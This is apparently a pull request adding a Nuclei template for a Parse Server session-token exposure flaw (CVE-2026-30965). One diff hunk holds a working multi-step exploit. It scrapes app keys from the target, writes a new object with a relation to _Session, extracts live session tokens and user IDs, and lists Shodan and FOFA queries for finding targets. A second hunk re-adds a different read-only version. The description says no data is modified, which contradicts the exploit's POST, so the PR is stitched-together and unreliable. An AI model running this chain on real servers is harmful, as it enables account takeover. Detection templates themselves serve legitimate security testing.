### PR TITLE
Add CVE-2026-30965 Parse Server relation redirect session exposure

### DIFF
--- a/http/cves/2026/CVE-2026-30965.yaml
+++ b/http/cves/2026/CVE-2026-30965.yaml
@@ -1,46 +1,156 @@
 id: CVE-2026-30965
 
 info:
-  name: Parse Server redirectClassNameForKey Session Token Exfiltration (CVE-2026-30965)
-  author: str4k3r
+  name: Parse Server < 8.6.21 / 9.x < 9.5.2 - Session Token Exfiltration
+  author: str4k3r,0x_Akoko
   severity: critical
-  description: >
-    Parse Server versions before 8.6.21 and 9.5.2-alpha.8 failed to re-apply
-    class-level authorization after redirectClassNameForKey changed a query's
-    target class. When a public relation points to _Session, an unauthenticated
-    query could return session records and sessionToken values. This template
-    uses the non-destructive in-band response oracle documented by the upstream
-    security regression test; the target must expose a public relation named
-    pivot from PublicData to _Session.
+  description: |
+    Parse Server < 8.6.21 / 9.x < 9.5.2 contains an information disclosure vulnerability caused by improper handling of the redirectClassNameForKey query parameter, letting authenticated or unauthenticated attackers exfiltrate session tokens, exploit requires ability to create or update an object with a new relation field depending on Class-Level Permissions.
+  impact: |
+    Attackers can exfiltrate session tokens and take over user accounts, leading to account compromise.
+  remediation: |
+    Update to version 9.5.2-alpha.8 or 8.6.21 or later.
   reference:
     - https://github.com/parse-community/parse-server/security/advisories/GHSA-6r2j-cxgf-495f
-    - https://github.com/parse-community/parse-server/releases/tag/8.6.21
     - https://nvd.nist.gov/vuln/detail/CVE-2026-30965
+    - https://github.com/parse-community/parse-server/commit/70b7b070e1135949dd80ecf382f34db0bfdbb71e
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+    cvss-score: 9.9
     cve-id: CVE-2026-30965
     cwe-id: CWE-863
   metadata:
     verified: true
-    max-request: 1
-  tags: cve,cve2026,parse-server,authorization-bypass,session-token,unauth
+    max-request: 5
+    vendor: parse-community
+    product: parse-server
+    shodan-query: '"X-Parse-Application-Id" OR http.html:"parseServerVersion"'
+    fofa-query: 'body="parseServerVersion" || header="X-Parse-Application-Id"'
+  tags: cve,cve2026,parse,parse-server,session-hijack,auth-bypass
 
 variables:
-  app_id: ""
-  class_name: "PublicData"
-  relation_key: "pivot"
+  cn: "{{to_lower(rand_text_alpha(8))}}"
+
+flow: (http(1) || http(2)) && http(3) && http(4) && http(5)
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/parse/classes/{{class_name}}?redirectClassNameForKey={{relation_key}}"
-    headers:
-      X-Parse-Application-Id: "{{app_id}}"
-    matchers-condition: and
+  - raw:
+      - |
+        GET {{BaseURL}}/ HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: appid
+        internal: true
+        group: 1
+        regex:
+          - '(?:applicationId|appId|APP_ID|PARSE_APP_ID)\s*[=:,]\s*"([A-Za-z0-9]{20,})"'
+          - 'Parse\.initialize\("([A-Za-z0-9]{20,})"'
+          - 'X-Parse-Application-Id["\s:]+([A-Za-z0-9]{20,})'
+
+      - type: regex
+        name: jskey
+        internal: true
+        group: 1
+        regex:
+          - '(?:javascriptKey|javaScriptKey|jsKey|JS_KEY|PARSE_JS_KEY)\s*[=:,]\s*"([A-Za-z0-9]{20,})"'
+          - 'Parse\.initialize\("[A-Za-z0-9]+"\s*,\s*"([A-Za-z0-9]{20,})"'
+
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: body
-        words:
-          - '"sessionToken"'
+      - type: dsl
+        dsl:
+          - 'len(appid) > 0'
+          - 'len(jskey) > 0'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET {{BaseURL}}/index.js HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: appid
+        internal: true
+        group: 1
+        regex:
+          - '(?:applicationId|appId|APP_ID|PARSE_APP_ID)\s*[=:,]\s*"([A-Za-z0-9]{20,})"'
+          - 'Parse\.initialize\("([A-Za-z0-9]{20,})"'
+          - 'X-Parse-Application-Id["\s:]+([A-Za-z0-9]{20,})'
+
+      - type: regex
+        name: jskey
+        group: 1
+        regex:
+          - '(?:javascriptKey|javaScriptKey|jsKey|JS_KEY|PARSE_JS_KEY)\s*[=:,]\s*"([A-Za-z0-9]{20,})"'
+          - 'Parse\.initialize\("[A-Za-z0-9]+"\s*,\s*"([A-Za-z0-9]{20,})"'
+        internal: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'len(appid) > 0'
+          - 'len(jskey) > 0'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET {{BaseURL}}/parse/health HTTP/1.1
+        Host: {{Hostname}}
+        X-Parse-Application-Id: {{appid}}
+        X-Parse-Javascript-Key: {{jskey}}
+
+    matchers:
+      - type: dsl
+        internal: true
+        condition: and
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "ok")'
+
+  - raw:
+      - |
+        POST {{BaseURL}}/parse/classes/{{cn}} HTTP/1.1
+        Host: {{Hostname}}
+        X-Parse-Application-Id: {{appid}}
+        X-Parse-Javascript-Key: {{jskey}}
+        Content-Type: application/json
+
+        {"pivot":{"__op":"AddRelation","objects":[{"__type":"Pointer","className":"_Session","objectId":"{{cn}}"}]}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 201'
+          - 'contains(body, "objectId")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET {{BaseURL}}/parse/classes/{{cn}}?redirectClassNameForKey=pivot&limit=3 HTTP/1.1
+        Host: {{Hostname}}
+        X-Parse-Application-Id: {{appid}}
+        X-Parse-Javascript-Key: {{jskey}}
+
+    extractors:
+      - type: regex
+        name: session_tokens
+        group: 1
+        regex:
+          - '"sessionToken"\s*:\s*"(r:[a-f0-9]+)"'
+      - type: regex
+        name: user_ids
+        group: 1
+        regex:
+          - '"user":{"__type":"Pointer","className":"_User","objectId":"([A-Za-z0-9]+)"'
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(body, "sessionToken", "results")'
+        condition: and

--- a/http/cves/2026/CVE-2026-30965.yaml
+++ b/http/cves/2026/CVE-2026-30965.yaml
@@ -1,0 +1,46 @@
+id: CVE-2026-30965
+
+info:
+  name: Parse Server redirectClassNameForKey Session Token Exfiltration (CVE-2026-30965)
+  author: str4k3r
+  severity: critical
+  description: >
+    Parse Server versions before 8.6.21 and 9.5.2-alpha.8 failed to re-apply
+    class-level authorization after redirectClassNameForKey changed a query's
+    target class. When a public relation points to _Session, an unauthenticated
+    query could return session records and sessionToken values. This template
+    uses the non-destructive in-band response oracle documented by the upstream
+    security regression test; the target must expose a public relation named
+    pivot from PublicData to _Session.
+  reference:
+    - https://github.com/parse-community/parse-server/security/advisories/GHSA-6r2j-cxgf-495f
+    - https://github.com/parse-community/parse-server/releases/tag/8.6.21
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-30965
+  classification:
+    cve-id: CVE-2026-30965
+    cwe-id: CWE-863
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2026,parse-server,authorization-bypass,session-token,unauth
+
+variables:
+  app_id: ""
+  class_name: "PublicData"
+  relation_key: "pivot"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/parse/classes/{{class_name}}?redirectClassNameForKey={{relation_key}}"
+    headers:
+      X-Parse-Application-Id: "{{app_id}}"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - '"sessionToken"'


### PR DESCRIPTION
## Vulnerability
Parse Server 8.6.20 follows a public relation redirect to the internal `_Session` class without applying the destination class ACL. Parse Server 8.6.21 enforces class authorization before following the redirect.

## Template behavior
The template requests the configured relation with `redirectClassNameForKey`, extracts the returned session object, and matches a session token in the response. The request is read-only and does not modify Parse data.

## Required configuration
Seed an authorized public-data object with a relation key pointing to a test `_Session` object. Set `app_id`, `class_name`, and `relation_key` to the application and relation used by that fixture.

## Impact
A caller can disclose session tokens and potentially impersonate Parse users whose sessions are exposed through the relation.

## Usage
```bash
nuclei -u <authorized-target> -t http/cves/2026/CVE-2026-30965.yaml -var app_id=<parse-app-id> -var class_name=<public-class> -var relation_key=<relation-key>
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
